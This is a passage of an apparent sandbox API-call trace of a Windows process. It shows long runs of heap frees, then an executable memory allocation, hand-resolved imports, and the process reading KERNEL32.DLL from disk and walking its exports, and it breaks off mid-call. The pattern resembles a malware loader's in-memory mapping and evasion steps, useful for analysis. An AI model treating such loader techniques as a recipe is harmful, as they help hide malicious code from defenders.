hHeap=0x530000) returned 1 [0117.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e5fad0 | out: hHeap=0x530000) returned 1 [0117.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e72ce0 | out: hHeap=0x530000) returned 1 [0117.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e85ef0 | out: hHeap=0x530000) returned 1 [0117.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2e99100 | out: hHeap=0x530000) returned 1 [0117.863] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2eac310 | out: hHeap=0x530000) returned 1 [0117.865] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ebf520 | out: hHeap=0x530000) returned 1 [0117.865] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ed2730 | out: hHeap=0x530000) returned 1 [0117.865] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ee5940 | out: hHeap=0x530000) returned 1 [0117.865] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ef8b50 | out: hHeap=0x530000) returned 1 [0117.869] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f0bd60 | out: hHeap=0x530000) returned 1 [0117.869] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f1ef70 | out: hHeap=0x530000) returned 1 [0117.869] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f32180 | out: hHeap=0x530000) returned 1 [0117.869] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f45390 | out: hHeap=0x530000) returned 1 [0117.869] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f585a0 | out: hHeap=0x530000) returned 1 [0117.869] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f6b7b0 | out: hHeap=0x530000) returned 1 [0117.872] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f7e9c0 | out: hHeap=0x530000) returned 1 [0117.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2f91bd0 | out: hHeap=0x530000) returned 1 [0117.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2fa4de0 | out: hHeap=0x530000) returned 1 [0117.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2fb7ff0 | out: hHeap=0x530000) returned 1 [0117.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2fcb200 | out: hHeap=0x530000) returned 1 [0117.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2fde410 | out: hHeap=0x530000) returned 1 [0117.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ff1620 | out: hHeap=0x530000) returned 1 [0117.873] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3004830 | out: hHeap=0x530000) returned 1 [0117.877] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3017a40 | out: hHeap=0x530000) returned 1 [0117.877] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x302ac50 | out: hHeap=0x530000) returned 1 [0117.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x303de60 | out: hHeap=0x530000) returned 1 [0117.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3051070 | out: hHeap=0x530000) returned 1 [0117.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3064280 | out: hHeap=0x530000) returned 1 [0117.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3077490 | out: hHeap=0x530000) returned 1 [0117.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x308a6a0 | out: hHeap=0x530000) returned 1 [0117.878] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x309d8b0 | out: hHeap=0x530000) returned 1 [0117.879] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x30b0ac0 | out: hHeap=0x530000) returned 1 [0117.879] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x30c3cd0 | out: hHeap=0x530000) returned 1 [0117.879] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x30d6ee0 | out: hHeap=0x530000) returned 1 [0117.879] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x30ea0f0 | out: hHeap=0x530000) returned 1 [0117.883] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x30fd300 | out: hHeap=0x530000) returned 1 [0118.126] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3110510 | out: hHeap=0x530000) returned 1 [0118.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3123720 | out: hHeap=0x530000) returned 1 [0118.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3136930 | out: hHeap=0x530000) returned 1 [0118.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3149b40 | out: hHeap=0x530000) returned 1 [0118.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x315cd50 | out: hHeap=0x530000) returned 1 [0118.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x316ff60 | out: hHeap=0x530000) returned 1 [0118.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3183170 | out: hHeap=0x530000) returned 1 [0118.129] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3196380 | out: hHeap=0x530000) returned 1 [0118.133] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31a9590 | out: hHeap=0x530000) returned 1 [0118.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31bc7a0 | out: hHeap=0x530000) returned 1 [0118.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31cf9b0 | out: hHeap=0x530000) returned 1 [0118.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31e2bc0 | out: hHeap=0x530000) returned 1 [0118.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f5dd0 | out: hHeap=0x530000) returned 1 [0118.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3208fe0 | out: hHeap=0x530000) returned 1 [0118.134] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x321c1f0 | out: hHeap=0x530000) returned 1 [0118.139] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x322f400 | out: hHeap=0x530000) returned 1 [0118.139] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3242610 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3255820 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3268a30 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x327bc40 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x328ee50 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x32a2060 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x32b5270 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x32c8480 | out: hHeap=0x530000) returned 1 [0118.140] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x32db690 | out: hHeap=0x530000) returned 1 [0118.144] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x32ee8a0 | out: hHeap=0x530000) returned 1 [0118.147] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3301ab0 | out: hHeap=0x530000) returned 1 [0118.147] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3314cc0 | out: hHeap=0x530000) returned 1 [0118.147] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3327ed0 | out: hHeap=0x530000) returned 1 [0118.150] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x333b0e0 | out: hHeap=0x530000) returned 1 [0118.151] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x334e2f0 | out: hHeap=0x530000) returned 1 [0118.151] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3361500 | out: hHeap=0x530000) returned 1 [0118.151] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3374710 | out: hHeap=0x530000) returned 1 [0118.152] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3387920 | out: hHeap=0x530000) returned 1 [0118.153] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x339ab30 | out: hHeap=0x530000) returned 1 [0118.153] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x33add40 | out: hHeap=0x530000) returned 1 [0118.153] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x33c0f50 | out: hHeap=0x530000) returned 1 [0118.153] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x33d4160 | out: hHeap=0x530000) returned 1 [0118.153] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x33e7370 | out: hHeap=0x530000) returned 1 [0118.153] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x33fa580 | out: hHeap=0x530000) returned 1 [0118.157] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x340d790 | out: hHeap=0x530000) returned 1 [0118.161] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x34209a0 | out: hHeap=0x530000) returned 1 [0118.161] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3433bb0 | out: hHeap=0x530000) returned 1 [0118.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3446dc0 | out: hHeap=0x530000) returned 1 [0118.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3459fd0 | out: hHeap=0x530000) returned 1 [0118.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x346d1e0 | out: hHeap=0x530000) returned 1 [0118.383] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x34803f0 | out: hHeap=0x530000) returned 1 [0118.384] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3493600 | out: hHeap=0x530000) returned 1 [0118.385] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x34a6810 | out: hHeap=0x530000) returned 1 [0118.385] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x34b9a20 | out: hHeap=0x530000) returned 1 [0118.385] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x34ccc30 | out: hHeap=0x530000) returned 1 [0118.385] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x34dfe40 | out: hHeap=0x530000) returned 1 [0118.385] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x34f3050 | out: hHeap=0x530000) returned 1 [0118.389] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3506260 | out: hHeap=0x530000) returned 1 [0118.390] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3519470 | out: hHeap=0x530000) returned 1 [0118.390] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x352c680 | out: hHeap=0x530000) returned 1 [0118.390] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x353f890 | out: hHeap=0x530000) returned 1 [0118.395] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3552aa0 | out: hHeap=0x530000) returned 1 [0118.395] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3565cb0 | out: hHeap=0x530000) returned 1 [0118.396] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3578ec0 | out: hHeap=0x530000) returned 1 [0118.397] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x358c0d0 | out: hHeap=0x530000) returned 1 [0118.397] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x359f2e0 | out: hHeap=0x530000) returned 1 [0118.397] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x35b24f0 | out: hHeap=0x530000) returned 1 [0118.397] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x35c5700 | out: hHeap=0x530000) returned 1 [0118.400] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x35d8910 | out: hHeap=0x530000) returned 1 [0118.402] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x35ebb20 | out: hHeap=0x530000) returned 1 [0118.402] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x35fed30 | out: hHeap=0x530000) returned 1 [0118.402] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3611f40 | out: hHeap=0x530000) returned 1 [0118.402] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3625150 | out: hHeap=0x530000) returned 1 [0118.406] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3638360 | out: hHeap=0x530000) returned 1 [0118.408] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x364b570 | out: hHeap=0x530000) returned 1 [0118.411] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x365e780 | out: hHeap=0x530000) returned 1 [0118.411] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3671990 | out: hHeap=0x530000) returned 1 [0118.411] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3684ba0 | out: hHeap=0x530000) returned 1 [0118.412] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3697db0 | out: hHeap=0x530000) returned 1 [0118.413] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x36aafc0 | out: hHeap=0x530000) returned 1 [0118.413] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x36be1d0 | out: hHeap=0x530000) returned 1 [0118.413] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x36d13e0 | out: hHeap=0x530000) returned 1 [0118.413] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x36e45f0 | out: hHeap=0x530000) returned 1 [0118.602] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x36f7800 | out: hHeap=0x530000) returned 1 [0118.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x370aa10 | out: hHeap=0x530000) returned 1 [0118.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x371dc20 | out: hHeap=0x530000) returned 1 [0118.603] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3730e30 | out: hHeap=0x530000) returned 1 [0118.606] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3744040 | out: hHeap=0x530000) returned 1 [0118.608] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3757250 | out: hHeap=0x530000) returned 1 [0118.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x376a460 | out: hHeap=0x530000) returned 1 [0118.610] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x377d670 | out: hHeap=0x530000) returned 1 [0118.611] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3790880 | out: hHeap=0x530000) returned 1 [0118.612] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x37a3a90 | out: hHeap=0x530000) returned 1 [0118.612] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x37b6ca0 | out: hHeap=0x530000) returned 1 [0118.612] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x37c9eb0 | out: hHeap=0x530000) returned 1 [0118.613] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x37dd0c0 | out: hHeap=0x530000) returned 1 [0118.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x37f02d0 | out: hHeap=0x530000) returned 1 [0118.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x38034e0 | out: hHeap=0x530000) returned 1 [0118.616] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x38166f0 | out: hHeap=0x530000) returned 1 [0118.618] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3829900 | out: hHeap=0x530000) returned 1 [0118.618] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x383cb10 | out: hHeap=0x530000) returned 1 [0118.620] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x384fd20 | out: hHeap=0x530000) returned 1 [0118.622] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3862f30 | out: hHeap=0x530000) returned 1 [0118.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3876140 | out: hHeap=0x530000) returned 1 [0118.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3889350 | out: hHeap=0x530000) returned 1 [0118.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x389c560 | out: hHeap=0x530000) returned 1 [0118.625] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x38af770 | out: hHeap=0x530000) returned 1 [0118.627] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x38c2980 | out: hHeap=0x530000) returned 1 [0118.627] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x38d5b90 | out: hHeap=0x530000) returned 1 [0118.627] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x38e8da0 | out: hHeap=0x530000) returned 1 [0118.629] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x38fbfb0 | out: hHeap=0x530000) returned 1 [0118.631] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x390f1c0 | out: hHeap=0x530000) returned 1 [0118.631] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39223d0 | out: hHeap=0x530000) returned 1 [0118.633] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39355e0 | out: hHeap=0x530000) returned 1 [0118.636] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39487f0 | out: hHeap=0x530000) returned 1 [0118.966] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x395ba00 | out: hHeap=0x530000) returned 1 [0118.969] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x396ec10 | out: hHeap=0x530000) returned 1 [0118.972] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3981e20 | out: hHeap=0x530000) returned 1 [0118.973] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3995030 | out: hHeap=0x530000) returned 1 [0118.973] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39a8240 | out: hHeap=0x530000) returned 1 [0118.974] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39bb450 | out: hHeap=0x530000) returned 1 [0118.974] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39ce660 | out: hHeap=0x530000) returned 1 [0118.976] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39e1870 | out: hHeap=0x530000) returned 1 [0118.976] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x39f4a80 | out: hHeap=0x530000) returned 1 [0118.978] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a07c90 | out: hHeap=0x530000) returned 1 [0118.979] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a1aea0 | out: hHeap=0x530000) returned 1 [0118.981] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a2e0b0 | out: hHeap=0x530000) returned 1 [0118.983] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a412c0 | out: hHeap=0x530000) returned 1 [0118.985] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a544d0 | out: hHeap=0x530000) returned 1 [0118.989] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a676e0 | out: hHeap=0x530000) returned 1 [0118.993] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a7a8f0 | out: hHeap=0x530000) returned 1 [0118.998] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3a8db00 | out: hHeap=0x530000) returned 1 [0118.998] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3aa0d10 | out: hHeap=0x530000) returned 1 [0119.210] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3ab3f20 | out: hHeap=0x530000) returned 1 [0119.212] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3ac7130 | out: hHeap=0x530000) returned 1 [0119.214] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3ada340 | out: hHeap=0x530000) returned 1 [0119.216] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3aed550 | out: hHeap=0x530000) returned 1 [0119.219] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3b00760 | out: hHeap=0x530000) returned 1 [0119.222] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x3b13970 | out: hHeap=0x530000) returned 1 [0119.236] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57a670 | out: hHeap=0x530000) returned 1 [0119.238] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0119.242] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0119.243] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0119.243] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0119.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0119.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0119.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0119.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0119.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0119.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0119.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0119.245] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0119.246] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0119.246] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0119.246] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0119.246] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0119.246] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0119.246] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0119.246] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0119.246] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0119.246] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55db20 | out: hHeap=0x530000) returned 1 [0119.247] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x57d920 | out: hHeap=0x530000) returned 1 [0119.251] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x540d90 | out: hHeap=0x530000) returned 1 [0119.252] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0119.252] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0119.252] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0119.252] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0119.252] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0119.252] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0119.254] GetProcessHeap () returned 0x530000 [0119.254] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x68) returned 0x538ce0 [0119.458] GetProcessHeap () returned 0x530000 [0119.458] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x5490e0 [0119.458] GetProcessHeap () returned 0x530000 [0119.458] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x48) returned 0x540340 [0119.459] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0119.459] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0119.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0119.459] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0119.460] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0119.460] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0119.460] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0119.460] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0119.461] GetProcessHeap () returned 0x530000 [0119.461] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xac430) returned 0x55c5d0 [0119.463] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0119.463] ReadFile (in: hFile=0x134, lpBuffer=0x55c5d0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x55c5d0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0119.472] CloseHandle (hObject=0x134) returned 1 [0119.473] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0119.479] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0119.479] lstrcmpA 